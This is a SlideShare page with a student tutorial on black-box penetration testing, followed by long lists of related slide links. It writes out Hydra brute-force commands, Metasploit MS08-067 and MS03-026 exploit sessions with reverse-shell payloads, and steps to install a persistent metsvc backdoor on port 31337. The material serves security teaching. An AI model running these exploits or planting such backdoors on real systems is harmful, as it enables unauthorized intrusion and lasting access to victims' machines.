SlideShare a Scribd company logo

Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates

Download as DOCX, PDF
Syed Ubaid Ali Jafri
Syed Ubaid Ali Jafri

Syed Ubaid Ali Jafri Informed Information Security Students how to conduct black box penetration testing if you do not have prior knowledge about the network environment, Few steps and consideration that should be in mind before conducting black box audit

EducationTechnology
1 of 13
BLACKBOX PENTESTING Conducting a Penetration Test on an Organization This document is decided to give readers an outlook on how a penetration test can be successfully done on an organization. A methodology has been drawn out in this document to allow readers to be acquainted with the process that penetration testers go through to conduct a penetration test.
What is a Penetration Test? Penetration tests are a great way to identify vulnerabilities that exists in a system or network that has an existing security measures in place. A penetration test usually involves the use of attacking methods conducted by trusted individual that are similarly used by hostile intruders or hackers. Depending on the type of test that is conducted, this may involve a simple scan of an IP addresses to identify machines that are offering services with known vulnerabilities or even exploiting known vulnerabilities that exists in an unpatched operating system. The results of these tests or attacks are then documented and presented as report to the owner of the system and the vulnerabilities identified can then be resolved. Bear in mind that a penetration test does not last forever. Depending on the organization conducting the tests, the time frame to conduct each test varies. A penetration test is basically an attempt to breach the security of a network or system and is not a full security audit. This means that it is no more than a view of a system’s security at a single moment in time. At this time, the known vulnerabilities, weaknesses or misconfigured systems have not changed within the time frame the penetration test is conducted. Information gathering and analysis After doing the necessary planning and preparation with the organization (or target) the next step is to gather as much information as possible about the targeted systems or networks. There’s a wealth of tools and online resources available for us to do the necessary information gathering. If the intended target has an online website, this is a good place to start your information gathering. We should always remember that any kind of information gathered during this stage may prove useful to us in the other stages of the penetration test. Information is power. A very good online resource is available at http://www.netcraft.com. The people at Netcraft have developed a service that has made our information gathering quite simple. Their service examines a network connected to the Internet and reports back which hosts are visible
Black Box Pentest Pattern Notice: You must be connect to the internet to perform black box Tools For Immediate Usage: 1) NMAP 2) Putty 3) Wireshark 4) Hydra 5) Backtrack
NMAP: scan the ports of the IP Address associated with the network and the internet by getting the port result perform the attack on the relevant port, for example port 22,23 use hydra for immediate telnet or SSH attack. Putty: By getting the username and password from hydra put these information in Putty in order to gain access in the network. Wireshark: Sniff the network packet and trace whether the route is correct or not Backtrack: use msfconsole for attack analysis for example RPC attack, Oracle attack. Netbios: use NETBIOS attack simulation Get advance Who is: Perform advance who is attack on the web to get the information of DNS server and domain msfconsole Working A very useful tool to conduct a network survey is Nmap. Nmap is a tool made for scanning large networks. We could also use Nmap to determine what operating systems are running on a network as well as the type of packet filters/firewalls are in use, and numerous other characteristics.
There are tools available that can automate vulnerability detection. Such a tool is Nessus (http://www.nessus.org). Nessus is a security scanner that audit remotely a given network and determine whether vulnerabilities exists in it. It produces a list of vulnerabilities that exist in a network as well as steps that should be taken to address these vulnerabilities. A screen shot is shown below:
Figure The completion of the vulnerability detection will produce a definite list of targets to investigate in depth. These lists of targets will be used in the next stage. A penetration will be attempted at these targets that have their vulnerabilities defined. Penetration Attempt after determining the vulnerabilities exist in the system, the next stage is to identify suitable targets for a penetration attempt. The time and effort that need to put in for the systems that have vulnerabilities need to be estimated accordingly. Estimations on how long a penetration test takes on a particular system are important at this point. The target chosen to perform the penetration attempt is also important. One practice that most organizations do is to name their machines in a way that they understand what the machine does. The computer name of the target is sometimes a decisive factor for choosing targets. Often after a network survey you would find computer names like SourceCode_PC, Int_Surfing and others that give penetration testers an idea of what the machine does. By choosing their target properly, penetration testers will not waste time and effort doing any redundant job. Normally penetration tests have a certain constraint and penetration tester should not waste any time unnecessarily. There are other ways to choose a target. The above just demonstrates some criteria used.
Password cracking has become a normal practice in penetration tests. In most cases, you’ll find services that are running on systems like telnet and ftp. This is a good place to start and use our password cracking methods to penetrate these systems. The list below shows just some of the password cracking methods used: - Dictionary Attack – Uses a word list or dictionary file. Hybrid Crack - Tests for passwords that are variations of the words in a dictionary file. Brute Force - Tests for passwords that are made up of characters going through all the combinations possible. Performing SSH, TELNET, NETBIOS, AAA Attack root@root:~ hydra -l ubaid -P password.txt 192.168.1.3 ssh root@root:~ cd /pentest/exploits/fasttrack root@root:/pentest/exploits/fasttrack# ./fasttrack.py -i
Select option Number 5: Mass client-Side Attack
Press Enter This is automatically check each and every payload one by one FOR NETBIOS ATTACK Open your backtrack Terminal and type nmap –sV 192.168.1.56 The results above are showing that the port 445 is open so we will try to use the netapi exploit. The microsoft-ds are a very common service in Windows machines. Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445. Open backtrack terminal and type msfconsole
Now Type “Search “netapi “command in the console, this command will search for the entire exploit modules with the pattern”netapi“ Now type use exploit/windows/smb/ms08_067_netapi Msf exploit (ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms08_067_netapi)>set lhost 192.168.1.2 (IP of Local Host) Msf exploit (ms08_067_netapi)>set rhost 192.168.1.56 (IP of Local Host) Msf exploit (ms08_067_netapi)>exploit Now you can get access of victim pc
Now type metsvc –A This command will upload some files and it will create a windows service on the remote machine The backdoor will run on port 31337 Now we will reboot the system. Now Open backtrack terminal type msfconsole use exploit/multi/handler set payload windows/metsvc_bind_tcp set rhost 192.168.1.56 (IP of Victim PC) set lport 31337 exploit
MSRPC Attack Analysis (Port 135) Description: Remote Procedure call uses 135 port and use for doing telnet and remote request over the ethernet Exploit: Root@Root:~ msfconsole msf > use windows/dcerpc/ms03_026_dcom msf exploit (ms03_026_dcom) > show options RHOST Required RPORT Not Required msf exploit (ms03_026_dcom) > set RHOST 200.100.100.10 msf exploit (ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit (ms03_026_dcom) > exploit RDP(Remote Desktop Procedure) (Port 139,445) Description: Server Message block Identification: nmap -v 192.168.1.2 Discovering open port 139 Discovering open port 445
Exploit: msf > use exploit/windows/smb/ms08_067_netapi msf exploit (ms08_067_netapi) > show options RHOST Required RPORT Not Required msf exploit(ms08_067_netapi) > set RHOST 200.100.100.10 msf exploit (ms08_067_netapi) > exploit Result of Remote Machine

Recommended

Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualizationamiable_indian
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Security Handbook
Security Handbook Security Handbook
Security HandbookAnthony Hasse
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
Ananth1
Ananth1Ananth1
Ananth1Shiva Krishna Chandra Shekar
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 

Recommended

Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualizationamiable_indian
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Security Handbook
Security Handbook Security Handbook
Security HandbookAnthony Hasse
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
Ananth1
Ananth1Ananth1
Ananth1Shiva Krishna Chandra Shekar
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Automated Malware Analysis
Automated Malware AnalysisAutomated Malware Analysis
Automated Malware AnalysisPushkar Pashupat
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encodingtechnology_flow
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
An internet worm early warning system
An internet worm early warning systemAn internet worm early warning system
An internet worm early warning systemUltraUploader
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
 
An os independent heuristics based worm-containment system
An os independent heuristics based worm-containment systemAn os independent heuristics based worm-containment system
An os independent heuristics based worm-containment systemUltraUploader
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
XST
XSTXST
XSTAung Khant
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJoe McCarthy
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsAsep Sopyan
 
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
Advanced malware analysis training session6 malware sandbox analysis
Advanced malware analysis training session6 malware sandbox analysisAdvanced malware analysis training session6 malware sandbox analysis
Advanced malware analysis training session6 malware sandbox analysisCysinfo Cyber Security Community
 
Automating malware analysis
Automating malware analysis Automating malware analysis
Automating malware analysis Cysinfo Cyber Security Community
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
Virtual Labs SniffingConsider what you have learned so far
Virtual Labs SniffingConsider what you have learned so far Virtual Labs SniffingConsider what you have learned so far
Virtual Labs SniffingConsider what you have learned so far AlleneMcclendon878
 

More Related Content

What's hot

Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Automated Malware Analysis
Automated Malware AnalysisAutomated Malware Analysis
Automated Malware AnalysisPushkar Pashupat
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encodingtechnology_flow
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
An internet worm early warning system
An internet worm early warning systemAn internet worm early warning system
An internet worm early warning systemUltraUploader
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
 
An os independent heuristics based worm-containment system
An os independent heuristics based worm-containment systemAn os independent heuristics based worm-containment system
An os independent heuristics based worm-containment systemUltraUploader
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJoe McCarthy
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsAsep Sopyan
 
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
Advanced malware analysis training session6 malware sandbox analysis
Advanced malware analysis training session6 malware sandbox analysisAdvanced malware analysis training session6 malware sandbox analysis
Advanced malware analysis training session6 malware sandbox analysisCysinfo Cyber Security Community
 

What's hot (20)

Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Automated Malware Analysis
Automated Malware AnalysisAutomated Malware Analysis
Automated Malware Analysis
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encoding
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
 
An internet worm early warning system
An internet worm early warning systemAn internet worm early warning system
An internet worm early warning system
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
 
An os independent heuristics based worm-containment system
An os independent heuristics based worm-containment systemAn os independent heuristics based worm-containment system
An os independent heuristics based worm-containment system
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
 
XST
XSTXST
XST
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and worms
 
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
 
Advanced malware analysis training session6 malware sandbox analysis
Advanced malware analysis training session6 malware sandbox analysisAdvanced malware analysis training session6 malware sandbox analysis
Advanced malware analysis training session6 malware sandbox analysis
 
Automating malware analysis
Automating malware analysis Automating malware analysis
Automating malware analysis
 

Similar to Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates

Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
Virtual Labs SniffingConsider what you have learned so far
Virtual Labs SniffingConsider what you have learned so far Virtual Labs SniffingConsider what you have learned so far
Virtual Labs SniffingConsider what you have learned so far AlleneMcclendon878
 
Penetration testing
Penetration testing Penetration testing
Penetration testing PTC
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.pptshreyng
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingRaghav Bisht
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introductionjagadeesh katla
 
CSEC 610 Individual Assignment Essay
CSEC 610 Individual Assignment EssayCSEC 610 Individual Assignment Essay
CSEC 610 Individual Assignment EssayRochelle Schear
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and PatchingEmmanuel Udeagha B.
 
Project in malware analysis:C2C
Project in malware analysis:C2CProject in malware analysis:C2C
Project in malware analysis:C2CFabrizio Farinacci
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingANURAG CHAKRABORTY
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxSuhailShaik16
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
20210906-Nessus-FundamentalInfoSec.ppsx
20210906-Nessus-FundamentalInfoSec.ppsx20210906-Nessus-FundamentalInfoSec.ppsx
20210906-Nessus-FundamentalInfoSec.ppsxSuman Garai
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?Dmitry Evteev
 
( Ethical hacking tools ) Information grathring
( Ethical hacking tools ) Information grathring( Ethical hacking tools ) Information grathring
( Ethical hacking tools ) Information grathringGouasmia Zakaria
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 

Similar to Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates (20)

Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
Virtual Labs SniffingConsider what you have learned so far
Virtual Labs SniffingConsider what you have learned so far Virtual Labs SniffingConsider what you have learned so far
Virtual Labs SniffingConsider what you have learned so far
 
Penetration testing
Penetration testing Penetration testing
Penetration testing
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Metasploit
MetasploitMetasploit
Metasploit
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introduction
 
CSEC 610 Individual Assignment Essay
CSEC 610 Individual Assignment EssayCSEC 610 Individual Assignment Essay
CSEC 610 Individual Assignment Essay
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and Patching
 
Project in malware analysis:C2C
Project in malware analysis:C2CProject in malware analysis:C2C
Project in malware analysis:C2C
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration Testing
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
20210906-Nessus-FundamentalInfoSec.ppsx
20210906-Nessus-FundamentalInfoSec.ppsx20210906-Nessus-FundamentalInfoSec.ppsx
20210906-Nessus-FundamentalInfoSec.ppsx
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 
( Ethical hacking tools ) Information grathring
( Ethical hacking tools ) Information grathring( Ethical hacking tools ) Information grathring
( Ethical hacking tools ) Information grathring
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 

More from Syed Ubaid Ali Jafri

Requirement for creating a Penetration Testing Lab
Requirement for creating a Penetration Testing LabRequirement for creating a Penetration Testing Lab
Requirement for creating a Penetration Testing LabSyed Ubaid Ali Jafri
 
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...Syed Ubaid Ali Jafri
 
Final Year Projects Computer Science (Information security) -2015
Final Year Projects Computer Science (Information security) -2015Final Year Projects Computer Science (Information security) -2015
Final Year Projects Computer Science (Information security) -2015Syed Ubaid Ali Jafri
 
Android 2.0 - 4.0 HTML Vulnerable
Android 2.0 - 4.0 HTML Vulnerable Android 2.0 - 4.0 HTML Vulnerable
Android 2.0 - 4.0 HTML Vulnerable Syed Ubaid Ali Jafri
 
Data Hiding (An Approach towards Stegnography)
Data Hiding (An Approach towards Stegnography) Data Hiding (An Approach towards Stegnography)
Data Hiding (An Approach towards Stegnography) Syed Ubaid Ali Jafri
 
Final Year Projects (Computer Science 2013) - Syed Ubaid Ali Jafri
Final Year Projects (Computer Science 2013) - Syed Ubaid Ali JafriFinal Year Projects (Computer Science 2013) - Syed Ubaid Ali Jafri
Final Year Projects (Computer Science 2013) - Syed Ubaid Ali JafriSyed Ubaid Ali Jafri
 
Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7
Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7
Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7Syed Ubaid Ali Jafri
 
Syed Ubaid Ali Jafri - Cryptography Techniques
Syed Ubaid Ali Jafri - Cryptography TechniquesSyed Ubaid Ali Jafri - Cryptography Techniques
Syed Ubaid Ali Jafri - Cryptography TechniquesSyed Ubaid Ali Jafri
 
Syed Ubaid Ali Jafri Lecture on Information Technology
Syed Ubaid Ali Jafri Lecture on Information Technology Syed Ubaid Ali Jafri Lecture on Information Technology
Syed Ubaid Ali Jafri Lecture on Information Technology Syed Ubaid Ali Jafri
 

More from Syed Ubaid Ali Jafri (18)

Requirement for creating a Penetration Testing Lab
Requirement for creating a Penetration Testing LabRequirement for creating a Penetration Testing Lab
Requirement for creating a Penetration Testing Lab
 
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
 
Review of network diagram
Review of network diagramReview of network diagram
Review of network diagram
 
Review of network diagram
Review of network diagramReview of network diagram
Review of network diagram
 
OSI Layered based attacks
OSI Layered based attacksOSI Layered based attacks
OSI Layered based attacks
 
Final Year Projects Computer Science (Information security) -2015
Final Year Projects Computer Science (Information security) -2015Final Year Projects Computer Science (Information security) -2015
Final Year Projects Computer Science (Information security) -2015
 
Data calling from web to C#
Data calling from web to C#Data calling from web to C#
Data calling from web to C#
 
Android 2.0 - 4.0 HTML Vulnerable
Android 2.0 - 4.0 HTML Vulnerable Android 2.0 - 4.0 HTML Vulnerable
Android 2.0 - 4.0 HTML Vulnerable
 
Data Hiding (An Approach towards Stegnography)
Data Hiding (An Approach towards Stegnography) Data Hiding (An Approach towards Stegnography)
Data Hiding (An Approach towards Stegnography)
 
Final Year Projects (Computer Science 2013) - Syed Ubaid Ali Jafri
Final Year Projects (Computer Science 2013) - Syed Ubaid Ali JafriFinal Year Projects (Computer Science 2013) - Syed Ubaid Ali Jafri
Final Year Projects (Computer Science 2013) - Syed Ubaid Ali Jafri
 
Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7
Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7
Syed Ubaid Ali Jafri - Secure IIS Configuration Windows 7
 
Syed Ubaid Ali Jafri - Cryptography Techniques
Syed Ubaid Ali Jafri - Cryptography TechniquesSyed Ubaid Ali Jafri - Cryptography Techniques
Syed Ubaid Ali Jafri - Cryptography Techniques
 
Syed Ubaid Ali Jafri Lecture on Information Technology
Syed Ubaid Ali Jafri Lecture on Information Technology Syed Ubaid Ali Jafri Lecture on Information Technology
Syed Ubaid Ali Jafri Lecture on Information Technology
 
Storage area network
Storage area networkStorage area network
Storage area network
 
Securing wireless network
Securing wireless networkSecuring wireless network
Securing wireless network
 
IP Security over VPN
IP Security over VPNIP Security over VPN
IP Security over VPN
 
Network security over ethernet
Network security over ethernetNetwork security over ethernet
Network security over ethernet
 
LAN Security
LAN Security LAN Security
LAN Security
 

Recently uploaded

Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room servicediscovermytutordmt
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDThiyagu K
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Celine George
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
